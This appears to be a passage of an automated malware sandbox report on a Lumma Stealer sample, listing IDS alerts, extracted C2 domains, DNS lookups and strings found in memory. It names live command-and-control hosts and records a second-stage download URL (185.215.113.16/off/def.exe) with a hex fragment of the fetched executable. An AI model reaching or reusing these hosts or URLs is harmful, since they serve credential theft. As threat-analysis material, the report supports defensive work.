Source: Network traffic	Suricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.5:50265 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.5:62124 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.5:51908 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49718 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49737 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.66.86:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: observerfry.lat
Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: curverpluch.lat

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 26 Dec 2024 12:01:54 GMTContent-Type: application/octet-streamContent-Length: 2801664Last-Modified: Thu, 26 Dec 2024 11:19:36 GMTConnection: keep-aliveETag: "676d3bc8-2ac000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 c5 4d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 67 74 77 78 76 6c 65 6c 00 40 2a 00 00 a0 00 00 00 32 2a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6e 6c 62 78 68 75 6e 00 20 00 00 00 e0 2a 00 00 04 00 00 00 9a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 9e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 104.21.66.86 104.21.66.86
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49725 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49737 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49743 -> 185.215.113.16:80

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49811 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
Source: z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=d9a670289c6fa342240024fa; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 26 Dec 2024 12:01:28 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: observerfry.lat
Source: global traffic	DNS traffic detected: DNS query: wordyfindy.lat
Source: global traffic	DNS traffic detected: DNS query: slipperyloo.lat
Source: global traffic	DNS traffic detected: DNS query: manyrestro.lat
Source: global traffic	DNS traffic detected: DNS query: shapestickyr.lat
Source: global traffic	DNS traffic detected: DNS query: talkynicer.lat
Source: global traffic	DNS traffic detected: DNS query: curverpluch.lat
Source: global traffic	DNS traffic detected: DNS query: tentabatte.lat
Source: global traffic	DNS traffic detected: DNS query: bashfulacid.lat
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: lev-tolstoi.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: mdec.nelreports.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: z3IxCpcpg4.exe, 00000000.00000002.2564809741.00000000008A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: z3IxCpcpg4.exe, 00000000.00000002.2564459293.000000000056A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeeWebKit/537.36
Source: z3IxCpcpg4.exe, 00000000.00000002.2564809741.00000000008A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exens
Source: z3IxCpcpg4.exe, 00000000.00000002.2564809741.00000000008A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exer
Source: z3IxCpcpg4.exe, 00000000.00000003.2260971149.000000000519A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: z3IxCpcpg4.exe, 00000000.00000003.2260971149.000000000519A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: z3IxCpcpg4.exe, 00000000.00000003.2260971149.000000000519A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: z3IxCpcpg4.exe, 00000000.00000003.2260971149.000000000519A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: z3IxCpcpg4.exe, 00000000.00000003.2260971149.000000000519A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: z3IxCpcpg4.exe, 00000000.00000003.2260971149.000000000519A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: z3IxCpcpg4.exe, 00000000.00000003.2260971149.000000000519A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: z3IxCpcpg4.exe, 00000000.00000003.2260971149.000000000519A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: z3IxCpcpg4.exe, 00000000.00000003.2260971149.000000000519A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_121.6.dr	String found in binary or memory: http://schema.org/Organization
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: z3IxCpcpg4.exe, 00000000.00000003.2260971149.000000000519A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: z3IxCpcpg4.exe, 00000000.00000003.2260971149.000000000519A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: z3IxCpcpg4.exe, 00000000.00000003.2211227482.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211143601.00000000051A4000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211352399.00000000051A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://aka.ms/certhelp
Source: chromecache_121.6.dr, chromecache_119.6.dr	String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://aka.ms/msignite_docs_banner
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_121.6.dr	String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
